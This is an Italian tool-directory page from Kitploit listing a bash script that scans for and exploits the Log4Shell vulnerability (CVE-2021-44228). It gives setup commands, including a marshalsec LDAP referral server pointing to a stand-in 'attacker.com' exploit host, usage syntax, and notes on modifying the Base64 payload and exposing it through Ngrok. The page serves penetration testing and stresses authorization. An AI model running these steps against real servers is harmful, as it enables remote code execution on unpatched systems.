Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Log4j-Scanner-Exploit — Script in bash che permette di identificare la vulnerabilità Log4j CVE-2021-44228 da remoto. | Kitploit
Strumenti/GitHubGitHub/julian911015/log4j-scanner-exploit
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubjulian911015/log4j-scanner-exploit

Log4j-Scanner-Exploit

Script in bash che permette di identificare la vulnerabilità Log4j CVE-2021-44228 da remoto.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
21 anno faNon ancora revisionato

Log4Shell Scanner Exploit

Script in bash che permette di identificare e/o sfruttare la vulnerabilità Log4shell in remoto. Questo strumento esegue diversi test utilizzando payload LDAP e header X-Api-Version, User-Agent e X-Forwarded-For.

Utilizzare sempre questo script con autorizzazione preventiva del proprietario del servizio/applicazione auditata.

Dipendenze:

  1. Creeremo un server LDAP preconfigurato da Github: https://github.com/mbechler/marshalsec

mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar

marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'

  1. Abilitiamo un server HTTP python3 -m http.server 8080

  2. Avere Java installato #sudo apt install default-jre

  3. Avere Curl installato #sudo apt-get install curl

Esempio di utilizzo:

Inserisci i seguenti parametri:

  • Lista di URL da scansionare
  • Indirizzo IP del server LDAP
  • Porta server LDAP
  • Indirizzo IP server HTTP
  • Porta server HTTP

#Esempio scansione di applicazione in rete interna:

  • ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

image

#Esempio scansione di applicazione su internet:

  • ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

image

Chiarimenti:

  • Il payload utilizzato invia un comando "ifconfig" alle macchine identificate come vulnerabili, questo payload è codificato in Base64 e può essere modificato per effettuare la fase di sfruttamento in un audit di pentesting.
  • Se si desidera utilizzare lo strumento su servizi internet si può avviare un servizio Ngrok che faccia port forwarding alla porta locale del server LDAP
  • Utilizzare sempre questo script con autorizzazione preventiva del proprietario del servizio/applicazione analizzata.
Scarica lo strumento